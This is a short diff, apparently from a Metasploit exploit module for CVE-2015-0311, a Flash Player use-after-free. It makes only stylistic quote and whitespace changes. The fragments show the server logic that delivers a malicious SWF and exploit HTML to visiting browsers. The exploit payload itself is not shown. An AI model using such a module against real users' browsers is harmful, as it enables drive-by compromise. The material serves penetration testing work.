@@ -33,7 +33,7 @@ def initialize(info={})
3333 [ 'CVE' , '2015-0311' ] ,
3434 [ 'URL' , 'https://helpx.adobe.com/security/products/flash-player/apsa15-01.html' ] ,
3535 [ 'URL' , 'http://blog.hacklab.kr/flash-cve-2015-0311-%EB%B6%84%EC%84%9D/' ] ,
36- [ 'URL' , 'http://blog.coresecurity.com/2015/03/04/exploiting-cve-2015-0311-a-use-after-free-in-adobe-flash-player/' ]
36+ [ 'URL' , 'http://blog.coresecurity.com/2015/03/04/exploiting-cve-2015-0311-a-use-after-free-in-adobe-flash-player/' ]
3737 ] ,
3838 'Payload' =>
3939 {
@@ -66,12 +66,12 @@ def on_request_exploit(cli, request, target_info)
6666 print_status ( "Request: #{ request . uri } " )
6767
6868 if request . uri =~ /\. swf$/
69- print_status ( " Sending SWF..." )
69+ print_status ( ' Sending SWF...' )
7070 send_response ( cli , @swf , { 'Content-Type' => 'application/x-shockwave-flash' , 'Cache-Control' => 'no-cache, no-store' , 'Pragma' => 'no-cache' } )
7171 return
7272 end
7373
74- print_status ( " Sending HTML..." )
74+ print_status ( ' Sending HTML...' )
7575 send_exploit_html ( cli , exploit_template ( cli , target_info ) , { 'Pragma' => 'no-cache' } )
7676 end
7777
@@ -98,7 +98,7 @@ def exploit_template(cli, target_info)
9898 end
9999
100100 def create_swf
101- path = ::File . join ( Msf ::Config . data_directory , " exploits" , " CVE-2015-0311" , " msf.swf" )
101+ path = ::File . join ( Msf ::Config . data_directory , ' exploits' , ' CVE-2015-0311' , ' msf.swf' )
102102 swf = ::File . open ( path , 'rb' ) { |f | swf = f . read }
103103
104104 swf
0 commit comments